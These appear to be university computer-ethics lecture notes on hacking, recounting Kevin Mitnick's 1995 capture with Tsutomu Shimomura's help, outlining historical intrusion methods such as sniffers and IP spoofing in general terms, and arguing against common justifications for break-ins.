Week 10: "Hacking"

The arrest of Kevin Mitnick. Late at night on Valentine's Day 1995, at the Players' Club Apartments off of Duraleigh Road in Raleigh, the famous "hacker" Kevin Mitnick was arrested. He had moved to Raleigh the preceding January 4th. A couple of months earlier he had disappeared from Seattle when his landlord told him that the police and Secret Service were looking for him. Mitnick said, "They have made me out to be John Dillinger or a desperado, but I'm just an excellent prankster. I have never profited from it."

Mitnick was captured largely due to the efforts of Tsutomu Shimomura, a security expert from the San Diego Supercomputing Center. Shimomura said, "I knew one thing for certain about Kevin Mitnick: He was in no way the hero of a movie about some mistreated computer hacker whose only crime was curiosity. There was nothing heroic about reading other people's e-mail and stealing their software."

Means of penetration. The word "hacker" originally meant a programmer who was adept at using the tricks of the trade. Largely because of confusion in the news media, it came to mean someone who breaks into computer systems. One common but low-tech means of penetration is by guessing passwords, as the Internet worm did. Another is a rogue login program, which is a user-level program that displays a screen that looks exactly like the login screen of the operating system. Then when an unsuspecting user logs in, the program makes a note of his user-ID and password, saves it for the hacker, and then changes the user-ID to the login of the unsuspecting user.

Sniffers. Then about 1993, so-called "sniffers" came into prominence on the Internet. First, the intruder breaks into a single system on a network. Then, (s)he installs a program that monitors the network, watching for certain kinds of traffic. It looks at the first part of a telnet, ftp, or rlogin session. Then it reports usernames and passwords back to the intruder. Some of the sessions may be logins on distant networks. So one weak machine anywhere can compromise the whole Internet. In February 1994, a rapid increase in sniffers led the CERT Coordination Center to issue an advisory. On NCSU Eos and Unity systems, Kerberos doesn't send passwords over the network, and everything that it sends to authorize access is encrypted. If a Kerberos key is cracked, it expires within hours, along with the user's tokens.

IP spoofing. Another ruse is IP spoofing. Robert Morris wrote the first paper on this as an intern at Bell Labs in 1984. To start out, a large number of connection requests are sent to a fileserver, overflowing its input buffer. Then it sends a series of SYN messages to the computer it wants to connect to, to find out how it generates sequence numbers. It next sends requests to the target computer, making them appear to be from the fileserver. In this way, the intruder masquerades as the fileserver, and could execute commands on the target computer.

Justifications for hacking. Some hackers contend that information should be free, and if it were free, there would be no need for intellectual property and security. Suppose that were true--an economist would say that by decreeing the price of information to be 0, you minimize the supply.

Others say that break-ins illustrate security problems and cause them to be fixed. For example, in 1984, Steven Gold and Robert Schifreen penetrated British Telecom's Prestel system and left a rude message in the Duke of Edinborough's account. The incident attracted enormous publicity and led directly to improved security for the Prestel system. They were convicted under the Forgery Act and fined £2350. But they won on appeal because they had caused no damage and had not defrauded anyone. Now break-ins are a crime in Britain, thanks to Computer Misuse Act of 1990. But, what of this argument? If the hackers wanted the security problems to be fixed, then why don't they try to get the problems fixed immediately? This pro-hacker view is like saying that vigilantes who tried to break into houses would be doing a neighborhood a service. Hackers do cause security modifications to be made, but at some expense, which would not be necessary if they didn't break in. It's like car theft: if cars are being stolen frequently, locking them isn't good enough; you need burglar alarms, and they cost extra money. There are other ways to expose security flaws, "tiger teams," for example.

A third perspective is that hackers are doing no harm; they are just learning about how computer systems operate. But is hard to be sure they're not causing trouble. Even slowing down a system slightly could be critical in some cases. For example, suppose the computer is being used to match organ donors with recipients and it fails to find a match soon enough. It could be seen as an intrusion of privacy. Certainly the military would prosecute any unauthorized access, even if it were only to a computer keeping track of laundry. Unfortunately, in computer systems, it is easy to damage something unintentionally, but hard to establish intent. At the very least, hackers undermine the trust that is essential for a "neighborhood" to operate smoothly. There are better ways to learn about computing.

Some hackers say they break into systems to watch for abuses and hold "Big Brother" at bay. Now that e-commerce is becoming important to large corporations, hacking is being undertaken for political motives. An example is the September 2000 attack on 168 Websites to protest high fuel taxes in the UK. Regardless of whether the abuses these hackers target is imagined or real, there are probably better protections than free-lance vigilantes.

The Kevin Mitnick case. For Kevin Mitnick, his downfall began with a Christmas-day attack on Shimomura's computers. An intruder became root on a SparcStation in a renovated San Francisco house where Shimomura was staying. The interloper used this computer to launch an attack on computers in Shimomura's beach house in San Diego. Shimomura was a computer-security expert at the San Diego Supercomputing Center who collected info on little-known vulnerabilities in operating systems. On his computers, he had a variety of security tools. Not all were on Internet computers, but some were. The attack was discovered when one of Shimomura's assistants, ECE student Andrew Gross, noticed Shimomura's log files getting shorter. Now, that is a sign that someone is erasing records from log files in order to cover his tracks. By looking at the file structure on his gateway computer, Shimomura discovered that a file called oki.tar.Z had momentarily existed. He thought that might have something to do with the Oki cellular phone software he had once reverse-engineered for a programmer who was developing field-diagnostic software to sell to telephone companies and law-enforcement agencies.

Shimomura was born in 1964 in Nagoya, Japan. His father was a biochemist and his mother a pharmacologist working on luminescence. His parents moved to Princeton University when he was very young. Tsutomu was generally interested in experimenting, but not in his classes. He got into an antiestablishment group at Princeton High School and got expelled for it, even though he had won a local math/science contest.

One of the intruder's modes of attack was IP spoofing to steal files from Shimomura's computer at SDSC. He copied these files to the Well, a northern California timesharing service, and made them publicly readable. It was the end of January 1995 when the Well realized they had been hacked. Shimomura, who was advising them, gave them permission to delete the files, but only after sending a message saying that the intruder was over quota. The idea was to avoid tipping him off that the Well knew something was amiss. The files appeared a week later on another account--which was an indication that the hacker had access to more than one Well account.

At first, Shimomura didn't think he was dealing with Mitnick; the attacks seemed too sophisticated. Later--using sniffers and filtering software--they captured some of his sessions and found that he looked for the string "itni" in the e-mail of New York Times reporter John Markoff. (Mitnick himself had tried using sniffing to see if he would be vulnerable in that way. But he concluded it wouldn't work because there was too much traffic. But he didn't anticipate the filtering software that Shimomura et al. installed.) Shimomura was concerned that Mitnick would get spooked and disappear again; this was their 2nd sting. Or, what if he retaliated with a more sophisticated attack on the Internet?

Mitnick was using Sprint cellular phone to connect to the Internet from Netcom's Raleigh number. (It was rare for someone to call an Internet service provider from a cellular phone, unless he was stealing the service. It was too expensive and prone to disconnection.) Shimomura traveled to Raleigh and worked with the FBI and other police agencies to capture Mitnick. They rigged a van with radio direction-finding equipment. Then they put a box over the top so Mitnick wouldn't get suspicious it if he happened to glance out. They staked out the Player's Club apartment complex off of Duraleigh Rd. just south of Glenwood. It took them two days to get the necessary warrants. For example, they needed to get a special warrant to make an arrest after 10:00 at night. Meanwhile, back in California, Andrew Gross misinterpreted a communication from Shimomura to mean that Mitnick had already been captured, and therefore started deleting the files Mitnick had stolen. This gave Shimomura a scare; he was afraid it would tip off Mitnick. Finally at 1:40 AM on February 15, 1995 they arrested him. If you are interested in learning about the pursuit in more detail, be sure to visit the Web site of Shimomura's book Takedown, where you can listen to Mitnick's voicemail and replay some of his hacking attempts.

Mitnick's harm. What harm did Mitnick do? Well, he read other people's e-mail. Especially computer-security researchers'. He stole the mail of Eric Allman, the author of sendmail--no doubt to find reports of new security problems with sendmail. He stole software indiscriminately, including a lot of free software. He pilfered cellular-phone software from Qualcomm, a San Diego technology firm. He got lots of programs from Intermetrics, an East Coast software house. From Silicon Graphics, he filched the 3-D workstation software used in creating most Hollywood movie special effects. He copped sundry software tools for breaking into computers in various ways. He stole 20,000 credit-card numbers from Netcom, an Internet access provider, but evidently never used any of them. He also got his hands on Netcom's subscriber password file (so he could "guess" poor passwords like Morris did).

He caused serious concern at Internet access providers. The Well, especially, was home to a number of privacy activists who would be paranoid about anyone reading their mail. The Well wanted to close the security holes, but Shimomura persuaded them not to for a time to avoid tipping off the intruder. "If you ... chang[e] passwords and clos[e] his accounts, he's almost certain to have hidden a Trojaned program somewhere ... that would allow him to come right back in, only this time you won't know where he is." He broke into computer systems at several academic, government, and commercial sites. Had root access at a number of them, so he could have destroyed files and accounting information. Even though he hadn't tried anything like that, who knew what he might try if on the verge of being caught. He eluded police for 3 years. He was almost captured at a Kinko's when having California driver records of law-enforcement officers faxed to him in 1992.

The penalty. Mitnick was indicted on 23 counts of computer and telecommunications fraud. These are just charges in NC, and didn't include the charges he faced in CA. In July '95, he pled guilty to one charge of cellular-telephone fraud and was sentenced to eight months in prison. The other 22 counts were dropped as a result of a plea bargain. He also faced charges in a number of other states. He was released from prison in January 2000.

Questions raised. The Mitnick case raises several questions. Should information on computer break-ins be more widely available? Shimomura says CERT describes break-ins too tersely to allow them to be reproduced. They will never allow publicize names of organizations that have suffered a break-in, saying that would discourage cooperation. A second question is, How is Mitnick different from the "ordinary" hacker? Is Kevin Mitnick the forerunner of a more dangerous breed of "cracker"?

Finally, what should be done about hacking? A three-pronged approach is needed. Revise existing laws to keep pace with technology. Build and run more secure systems. And lastly, sensitize individuals to ethical issues, like we are trying to do in this course..